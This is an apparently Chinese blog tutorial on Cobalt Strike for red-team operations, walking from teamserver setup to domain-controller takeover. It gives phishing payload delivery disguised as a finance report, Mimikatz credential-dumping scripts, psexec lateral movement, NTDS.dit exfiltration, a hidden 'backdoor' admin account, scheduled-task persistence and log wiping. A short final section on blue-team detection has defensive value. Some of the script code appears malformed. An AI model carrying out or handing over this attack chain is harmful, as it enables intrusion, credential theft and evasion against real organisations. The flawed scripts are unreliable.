护网红队内网攻坚：Cobalt Strike 实战全攻略，从服务器部署到域控突破，全流程实操！

最新推荐文章于 2025-12-15 12:55:55 发布

原创最新推荐文章于 2025-12-15 12:55:55 发布 · 997 阅读

27 ·

CC 4.0 BY-SA版权

文章标签：

#服务器 #运维 #web安全

网络安全同时被 3 个专栏收录

1286 篇文章

订阅专栏

学习路线

591 篇文章

订阅专栏

程序员

429 篇文章

订阅专栏

在这里插入图片描述

在护网行动的内网渗透对抗中，Cobalt Strike（简称 CS）是红队的 “王牌工具”—— 它集远控、横向移动、权限提升、域渗透等功能于一体，支持团队协作，能构建完整的攻击链。本文将从环境部署、核心功能、护网实战攻击链、蓝队防御对抗四个维度，用详细的步骤和命令，带你掌握 CS 的全流程用法，让你在护网内网对抗中所向披靡。

一、Cobalt Strike 环境部署与基础配置（搭建攻击平台）

1. 服务端部署（Linux 环境）

系统要求：推荐 Ubuntu 20.04 或 CentOS 7，需公网 IP（供客户端连接和目标上线）。
部署步骤：

下载 Cobalt Strike 压缩包，上传至服务器并解压。
生成自签名证书（避免流量被检测）：

keytool -keystore teamserver.keystore -keyalg RSA -genkey -alias teamserver -validity 3650

启动 TeamServer：

./teamserver <服务器公网IP> <密码> -C teamserver.keystore -K <密钥>

说明：<密码>为客户端连接密码，-C指定证书，-K指定密钥（需与证书生成时一致）。

2. 客户端连接（Windows 环境）

系统要求：Windows 10/11，需安装 Java 8+。
连接步骤：

解压 Cobalt Strike 客户端，运行cobaltstrike.exe。
配置连接信息：

Host：服务器公网 IP。
Port：默认 50050（可在 TeamServer 启动时指定）。
User：自定义用户名（如 redteam01）。
Password：与 TeamServer 启动时设置的密码一致。

点击 “Connect”，成功连接后进入 CS 主界面。

3. 团队协作配置

新建团队项目：在 CS 主界面点击 “New”，创建项目（如 “护网行动 2025”），方便团队共享攻击数据。
权限管理：通过 “View → Preferences → Team” 设置团队成员权限，避免误操作（如限制低权限成员的 Beacon 生成权限）。

二、Cobalt Strike 核心功能解析（模块实战）

1. Beacon（远控核心）—— 红队的 “手术刀”

Beacon 是 CS 的远控代理，支持交互式命令执行、文件传输、横向移动等功能，护网中核心用法：

生成 Payload（初始访问）：
- 场景：红队需通过钓鱼邮件获取目标初始控制权。
- 操作：

点击 “Attacks → Packages → Windows Executable”。
选择 Beacon 类型（HTTP、HTTPS、DNS，推荐 HTTPS 以加密通信）。
设置 Listener（监听器，指定 TeamServer 接收上线的地址和端口）。
生成payload.exe，通过钓鱼邮件诱使目标执行。

Beacon 命令实战：
- 上线后，在 Beacon 控制台执行命令：

beacon> shell whoami  # 执行系统命令

beacon> ps  # 查看进程列表

beacon> download C:\flag.txt  # 下载文件

beacon> upload /root/shell.php C:\inetpub\wwwroot  # 上传文件

2. Listener（监听器）—— 通信的 “桥梁”

Listener 用于配置 Beacon 的通信方式，护网中需重点关注其隐蔽性：

HTTPS Listener 配置：

点击 “Cobalt Strike → Listeners → Add”。
选择 “HTTPS”，设置：

Host：服务器公网 IP。
Port：443（常用端口，降低被拦截概率）。
Certificate：选择之前生成的teamserver.keystore。

点击 “Save”，生成 HTTPS 监听器，用于加密 Beacon 通信。

DNS Listener 配置（备用通信）：

若 HTTPS 通信被阻断，可配置 DNS 监听器（通过 DNS 请求传输数据），步骤类似 HTTPS，但需提前配置域名解析（如beacon.example.com指向 TeamServer）。

3. Aggressor Script（攻击脚本）—— 自动化的 “引擎”

Aggressor Script 是 CS 的脚本引擎，可自动化执行攻击任务，护网中常用脚本：

Mimikatz 凭证抓取脚本：

alias mimikatz {

&#x20;   local('\$pid');

&#x20;   \$pid = beacon\_pid(\$1);

&#x20;   beacon\_inline\_execute(\$1, "mimikatz.exe sekurlsa::logonpasswords exit", "mimikatz\_\$pid.txt");

&#x20;   download \$1, "mimikatz\_\$pid.txt";

&#x20;   rm \$1, "mimikatz\_\$pid.txt";

}

用法：在 Beacon 中执行mimikatz，自动抓取凭证并下载。

域内信息收集脚本：

alias enum\_domain {

&#x20;   local('\$domain');

&#x20;   \$domain = beacon\_hostname(\$1);

&#x20;   beacon\_inline\_execute(\$1, "nltest /dclist:\$domain", "dclist\_\$domain.txt");

&#x20;   beacon\_inline\_execute(\$1, "net group 'Domain Admins' /domain", "domain\_admins\_\$domain.txt");

&#x20;   download \$1, "dclist\_\$domain.txt";

&#x20;   download \$1, "domain\_admins\_\$domain.txt";

&#x20;   rm \$1, "dclist\_\$domain.txt";

&#x20;   rm \$1, "domain\_admins\_\$domain.txt";

}

用法：在 Beacon 中执行enum_domain，自动收集域控列表和域管理员信息。

三、护网红队实战：从初始访问到域控突破的攻击链

1. 阶段一：初始访问（获取 Beacon）

场景：红队通过钓鱼邮件投递 CS Payload，获取目标 Windows 服务器的初始控制权。
步骤：

生成 HTTPS Beacon Payload（payload.exe）。
将payload.exe伪装成 “财务报表.exe”，通过钓鱼邮件发送给目标管理员。
目标执行后，CS 界面的 “Beacon” 面板显示目标上线（Beacon 名称为目标主机名）。

2. 阶段二：内网信息收集

步骤：

在 Beacon 中执行sysinfo（查看系统信息）、netstat -an（查看网络连接），了解目标网络环境。
执行enum_domain脚本，收集域内信息（域控 IP、域管理员账号）。
执行mimikatz脚本，抓取目标主机的用户凭证（如admin:123456）。

3. 阶段三：横向移动（拿下域控）

步骤：

利用抓取的凭证，通过 Psexec 横向移动至域控：

beacon> psexec 192.168.1.100 -u admin -p 123456

说明：192.168.1.100为域控 IP，admin为域管理员账号，123456为密码。

域控上线后，执行shell net group "Domain Admins" /domain，确认已获得域管理员权限。
执行download C:\Windows\NTDS\NTDS.dit，下载域数据库（包含所有域用户凭证），完成域控突破。

4. 阶段四：权限维持

步骤：

在域控上创建隐藏管理员账号：

beacon> shell net user backdoor P@ssw0rd! /add

beacon> shell net localgroup administrators backdoor /add

部署持久性控制（如计划任务、服务项）：

beacon> schtasks /create /tn "Update" /tr "C:\payload.exe" /sc daily /st 00:00

清理痕迹：删除日志（wevtutil cl System、wevtutil cl Security），确保攻击不被追溯。

四、蓝队防御：Cobalt Strike 检测与对抗

1. 流量特征识别

HTTPS Beacon 流量：
- 特征：长连接、通信数据加密（无明显 HTTP 请求）、User-Agent 固定（如Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko）。
- 防御：在防火墙中设置规则，拦截非业务的 HTTPS 长连接；部署 SSL 流量解密设备，分析加密内容。
DNS Beacon 流量：
- 特征：大量 DNS 请求（如beacon1.example.com、beacon2.example.com），请求域名无实际业务意义。
- 防御：启用 DNS 安全策略，阻断异常 DNS 请求；部署 DNS 流量分析工具，识别域名生成算法（DGA）。

2. 进程与行为识别

Beacon 进程特征：
- 通常命名为payload.exe、update.exe等，无数字签名，进程树异常（如svchost.exe启动未知子进程）。
- 防御：部署 EDR 工具，设置规则拦截无签名的可疑进程；监控CreateRemoteThread等进程注入行为。
Mimikatz 行为特征：
- 读取lsass.exe内存（敏感系统调用）、创建mimikatz.exe进程。
- 防御：在 EDR 中设置规则，发现lsass.exe内存读取或mimikatz.exe进程时，自动隔离并告警。